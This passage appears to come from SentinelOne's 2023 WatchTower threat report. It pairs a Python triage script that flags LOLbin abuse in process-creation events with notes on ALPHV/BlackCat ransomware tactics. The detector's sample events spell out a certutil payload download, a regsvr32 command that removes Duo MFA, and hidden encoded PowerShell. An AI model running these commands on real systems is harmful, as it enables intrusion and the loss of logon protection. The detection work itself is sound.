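Three passages of this report describe behaviour that shows up in the same place in telemetry, the process-creation event: the most-abused LOLbins list (certutil, regsvr32, rundll32, mshta, bitsadmin and PowerShell), the Mallox kill chain in which sqlservr.exe spawns obfuscated PowerShell after MS-SQL exploitation, and the NoEscape regsvr32 /u commands above that unregister the Duo credential provider. The added Python example below (written for this edit, not code from SentinelOne) runs one rule set over Sysmon-style ParentImage / Image / CommandLine fields and reports which rules fire per event. The rule patterns, field names, rule names and the sample events (including the TEST-NET address and the truncated encoded command) are all constructed for this example.

```python
"""Process-creation triage for LOLbin abuse (added example; not code from the WatchTower report).

Runs a small rule set over process-creation events with Sysmon-style ParentImage / Image /
CommandLine fields and returns the rules that fire for each event. Rules cover the most-abused
LOLbins list, the Mallox pattern of sqlservr.exe spawning PowerShell, and the NoEscape regsvr32 /u
commands that unregister the Duo credential-provider DLLs. Patterns, field names and sample
events are assumptions made for this example.
"""
import re
from typing import Dict, List, Optional, Tuple

# rule name -> (ParentImage pattern or None, Image pattern, CommandLine pattern or None)
RULES: Dict[str, Tuple[Optional[str], str, Optional[str]]] = {
    "certutil_download_or_decode": (None, r"\\certutil\.exe$", r"[-/](?:urlcache|decode|encode)\b"),
    "regsvr32_remote_scriptlet": (None, r"\\regsvr32\.exe$", r"/i:https?://|scrobj\.dll"),
    # regsvr32 /u on a credential provider or filter DLL removes an MFA prompt from Windows logon
    "credential_provider_unregistered": (None, r"\\regsvr32\.exe$", r"\s/u\s.*(?:CredProv|CredFilter)[^\\]*\.dll"),
    "rundll32_script_or_url": (None, r"\\rundll32\.exe$", r"javascript:|https?://"),
    "mshta_remote_or_script": (None, r"\\mshta\.exe$", r"https?://|javascript:|vbscript:"),
    "bitsadmin_transfer": (None, r"\\bitsadmin\.exe$", r"/transfer\b"),
    # -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob of any meaningful length
    "encoded_powershell": (None, r"\\(?:powershell|pwsh)\.exe$", r"\s-e(?:ncodedcommand|nc|n|c)?\s+[A-Za-z0-9+/=]{20,}"),
    # xp_cmdshell / OLE automation abuse shows up as sqlservr.exe parenting a shell (Mallox kill chain)
    "sql_server_spawned_shell": (r"\\sqlservr\.exe$", r"\\(?:cmd|powershell|pwsh)\.exe$", None),
}

COMPILED = {name: tuple(re.compile(p, re.IGNORECASE) if p else None for p in pats)
            for name, pats in RULES.items()}


def match_rules(event: dict) -> List[str]:
    """Return the names of all rules whose parent, image and command-line patterns all match."""
    hits = []
    for name, (parent_re, image_re, cmd_re) in COMPILED.items():
        if parent_re and not parent_re.search(event.get("ParentImage", "")):
            continue
        if not image_re.search(event.get("Image", "")):
            continue
        if cmd_re and not cmd_re.search(event.get("CommandLine", "")):
            continue
        hits.append(name)
    return hits


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map event id -> rule hits, keeping only events that fired at least one rule."""
    result: Dict[int, List[str]] = {}
    for event in events:
        hits = match_rules(event)
        if hits:
            result[event["id"]] = hits
    return result


# Constructed events for this example; 203.0.113.10 is a TEST-NET-3 documentation address.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.exe"},
    {"id": 2, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"'},
    {"id": 3, "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # truncated UTF-16LE base64 of "IEX (New-Object", constructed
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\plugin.dll"'},          # benign registration
    {"id": 5, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
```

Event 3 fires two rules at once, which is the point of keeping the parent-process rule separate from the command-line rule: a sqlservr.exe child that is not encoded is still interesting, and encoded PowerShell under a benign parent still is. Events 4 and 5 show the ordinary uses of regsvr32 and rundll32 that these rules are written to leave alone.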
###### December 2023: ALPHV Continues Intimidation

ALPHV (also known as BlackCat) was one of the most active threat groups throughout 2023, carrying out multiple high-profile attacks. [ALPHV/BlackCat affiliates use advanced social engineering techniques and open source research on a company to gain initial access.](https://www.ic3.gov/Media/News/2023/231219.pdf) Actors pose as company IT and/or help desk staff and use phone calls or SMS messages to obtain credentials from employees to access the target network. ALPHV/BlackCat affiliates use uniform resource locators (URLs) to live-chat with victims to convey demands and initiate processes to restore the victims' encrypted files.

In December 2023, law enforcement announced a disruption campaign against the ransomware group known as ALPHV, Noberus, or BlackCat, which resulted in the seizure of several of the group's websites. After a few hours, the group claimed they had "unseized" their website. Researchers are aware that this group attempts to disable or uninstall any security services they encounter after achieving network access. ALPHV continues to be active at the time of this report's publication, with observed December 2023 ransomware attacks against specific targets of their choice after gaining access. ALPHV is known to use intimidating comments and passwords post-compromise, such as the one shown here:

```
"C:\7zr.exe" x c:\lockthis.zip -pTryAndDecryptMe1337420! -oC:\
```

SentinelOne is closely tracking this attacker group and will continue to support joint operations with other security groups.

#### About WatchTower

WatchTower is SentinelOne's threat hunting service, provided as a value-added benefit for Vigilance Respond and Vigilance Respond Pro customers. This service leverages SentinelOne's cyber threat intelligence experts, dedicated hunters, and investigators to identify new and innovative threat campaigns launched by cybercriminal and nation-state threat actors from across the globe.
Our team analyzes the threats, determines TTPs (Tactics, Techniques, Procedures), creates and launches hunting methodologies, and investigates findings on behalf of our customers. We know that threat actors are well-funded, highly intelligent, and persistent in devising new and innovative ways to penetrate computer networks. Additionally, we recognize that misplaced exclusions, unprotected endpoints, and end-of-life agent versions can create openings for attackers to leverage. For these reasons, we believe that a proactive approach to our customers' security, including threat hunting, is vital to a well-rounded MDR security program.

###### How it Works

The WatchTower hunting approach targets emerging threats identified by our threat intelligence team. We are constantly identifying new attacker TTPs and searching for their presence within Vigilance customer environments, across trillions of file and network events, registry changes, scheduled tasks, running processes, and logins.

###### About SentinelOne

SentinelOne (NYSE:S) is pioneering autonomous cybersecurity to prevent, detect, and respond to cyber attacks faster and with higher accuracy than ever before. Our Singularity XDR platform protects and empowers leading global enterprises with real-time visibility into attack surfaces, cross-platform correlation, and AI-powered response. Achieve more capability with less complexity.

## Contact us

sales@sentinelone.com
+1-855-868-3733
sentinelone.com

S1_WATCHTOWER_EOY2023_01172024
© SentinelOne 2024